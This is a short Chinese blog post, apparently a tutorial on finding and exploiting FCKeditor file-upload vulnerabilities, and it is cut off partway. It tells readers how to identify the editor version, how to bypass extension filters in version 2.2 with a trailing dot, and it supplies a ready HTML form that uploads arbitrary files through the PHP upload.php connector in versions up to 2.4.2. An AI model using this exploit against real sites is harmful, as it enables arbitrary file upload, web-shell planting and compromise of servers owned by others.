/includes/fckeditor/editor/filemanager/connectors/php/upload.php 淡淡的烟草味﹌ 2023-09-24 12:58 11阅读 0赞 ## Fckeditor常见漏洞的挖掘与利用整理汇总,FCKeditor文件上传漏洞及利用。/includes/fckeditor/editor/filemanager/connectors/php/upload.php ## 1 查看编辑器版本号 FCKeditor/\_whatsnew.html ——————————————————————————————————————————— 2. Version 2.2 版本号 Apache+linux 环境下在上传文件后面加个.突破!測试通过。 ——————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传随意文件!将下面保存为html文件,改动action地址。 <form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> /includes/fckeditor/editor/filem
还没有评论,来说两句吧...